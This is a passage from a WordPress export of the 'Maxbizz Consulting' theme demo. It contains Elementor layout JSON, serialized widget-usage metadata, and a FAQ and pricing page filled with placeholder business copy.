results.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"6444584","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"45d2a82","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"3076906","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-mission","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"d0c38ef","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"0a21f5d","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/our-vision.jpg","id":1029},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"4554b13","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"ebcd194","elType":"widget","settings":{"title":"Our Mission","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0ef6c14","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6614930","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"61f0b81","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"ed79a7d","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"dd17773","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"86","right":"0","bottom":"120","left":"0","isLinked":false},"_element_id":"our-vision","css_classes":"content-tab","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"49ce3f7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"fc1c0ad","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1725},"image_size":"full","image_box_shadow_box_shadow_type":"yes","image_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"cd3eacf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"42d9c0e","elType":"widget","settings":{"title":"Our Vision","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2922134","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a7bdb59","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Investment Management","description_text":"We welcome and celebrate different perspectives to help our firm, our clients and our people achieve enduring results.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"d35150b","elType":"widget","settings":{"selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/interface.svg","id":629},"library":"svg"},"title_text":"Private Credit & Equity","description_text":"We hire people with exceptional talents, abilities and potential, then create an environment where you can become the best.","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_space":{"unit":"px","size":20,"sizes":[]},"icon_size":{"unit":"px","size":17,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":10,"sizes":[]},"title_color":"#4B83FC","title_typography_typography":"custom","title_typography_font_family":"Amiri","title_typography_line_height":{"unit":"px","size":17,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"description_color":"#5F5F5F","description_typography_typography":"custom","description_typography_font_family":"Open Sans","description_typography_font_weight":"400"},"elements":[],"widgetType":"icon-box"},{"id":"9c23cfd","elType":"widget","settings":{"text":"Explore More "},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"0f844d1","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-value.jpg","id":549},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"105","left":"0","isLinked":false},"content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"fc8acf7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"f8ca7a4","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"82ac6eb","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]},"content_typography_typography":"custom","content_typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"21dc41a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"e7a0c01","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home2.png","id":1445},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aebe74e","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-value.jpg","id":558},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"117","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"c4c8174","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e7309f3","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"afeb8de","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"18aa73e","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"fd1dd49","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"cb7d5c6","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"6734af5","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"31d8a18","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"284c1cf","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"38f0ecc","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]}},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"3f45b25","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"8a829f1","elType":"section","settings":{"layout":"full_width"},"elements":[{"id":"0a0ed67","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae65e25","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":400,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:14:{s:8:"iheading";a:3:{s:5:"count";i:4;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:4;s:5:"title";i:4;s:11:"header_size";i:4;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:3;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:4;s:27:"title_typography_typography";i:4;s:33:"title_typography_font_size_mobile";i:4;s:14:"subtitle_style";i:4;s:11:"title_color";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:31;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:31;s:19:"_inline_size_tablet";i:17;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:8;s:13:"margin_mobile";i:2;s:6:"margin";i:4;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:1;s:10:"text_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:15;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:8;s:16:"content_position";i:5;s:6:"layout";i:7;}s:17:"section_structure";a:1:{s:9:"structure";i:10;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:5:{s:7:"padding";i:11;s:14:"padding_tablet";i:1;s:14:"padding_mobile";i:8;s:11:"_element_id";i:3;s:11:"css_classes";i:3;}}s:5:"style";a:1:{s:18:"section_background";a:6:{s:21:"background_background";i:4;s:16:"background_color";i:1;s:16:"background_image";i:3;s:19:"background_position";i:3;s:17:"background_repeat";i:3;s:15:"background_size";i:3;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"image_box";i:3;s:4:"link";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:3;}}s:5:"style";a:2:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}s:18:"style_text_section";a:2:{s:27:"title_typography_typography";i:4;s:26:"title_typography_font_size";i:4;}}}}s:9:"itabtitle";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:11:"title_boxes";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:12:"radius_title";i:1;s:8:"title_bg";i:1;s:18:"title_active_color";i:1;s:15:"title_active_bg";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:3:{s:5:"image";i:4;s:10:"image_size";i:4;s:12:"align_tablet";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:3:{s:32:"image_box_shadow_box_shadow_type";i:3;s:27:"image_box_shadow_box_shadow";i:3;s:19:"image_border_radius";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:3;s:11:"header_size";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}}}s:8:"icon-box";a:3:{s:5:"count";i:6;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:5:{s:13:"selected_icon";i:6;s:10:"title_text";i:6;s:16:"description_text";i:6;s:8:"position";i:6;s:10:"title_size";i:6;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:6;s:10:"icon_space";i:6;s:9:"icon_size";i:6;s:6:"rotate";i:6;}s:21:"section_style_content";a:9:{s:18:"title_bottom_space";i:6;s:11:"title_color";i:6;s:27:"title_typography_typography";i:6;s:28:"title_typography_font_family";i:6;s:28:"title_typography_line_height";i:6;s:17:"description_color";i:6;s:33:"description_typography_typography";i:6;s:34:"description_typography_font_family";i:6;s:34:"description_typography_font_weight";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:6;}}}}s:7:"ibutton";a:3:{s:5:"count";i:3;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:1:{s:4:"text";i:3;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}s:5:"style";a:2:{s:11:"style_title";a:5:{s:8:"bg_title";i:1;s:11:"title_color";i:1;s:12:"title_border";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;}s:13:"style_content";a:4:{s:10:"bg_content";i:1;s:13:"content_color";i:1;s:29:"content_typography_typography";i:1;s:35:"content_typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:1;s:15:"_padding_tablet";i:1;s:15:"_padding_mobile";i:1;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:1:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>FAQs</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/faqs/</link>
		<pubDate>Tue, 08 Sep 2020 09:22:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=566</guid>
		<description></description>
		<content:encoded><![CDATA[faqs	        <h3>Most Popular Questions</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you do fixed price or time and materials contracts? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention strategies.</p>				
				Do you offer volume or loyalty discounts? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				What problems does business consulting typically solve? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How is the scope of a consulting project determined? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
				How long does a business consulting project last? 
					<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.</p>				
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        flexible pricing plans	        <h3>Choose The Best Plan</h3>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
            Billed Monthly
                <label>
                    <input type="checkbox">
                </label>
			Billed Yearly
				<h6>basic plan</h6>				<h2><sup>$</sup> 69</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 79</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 89</h2>				<p>month</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>basic plan</h6>				<h2><sup>$</sup> 699</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>ultra plan</h6>				<h2><sup>$</sup> 799</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
				<h6>pro plan</h6>				<h2><sup>$</sup> 899</h2>				<p>year</p>				Discover the emerging technologies most relevant to your strategy by working.				<ul><li>Support Your Business</li><li>Revoke Dokument Access</li><li>Detailed Risk Profiling</li>
<li>Enter Unlimited Bils</li>
<li>Bank Transactions</li>
<li>Financial Strategy
</li></ul>
				<a>Choose Plane</a>			
		        <a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-1.svg" alt=""></figure></a><a href="#"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-1.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>566</wp:post_id>
		<wp:post_date><![CDATA[2020-09-08 09:22:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-08 09:22:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[faqs]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[567]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
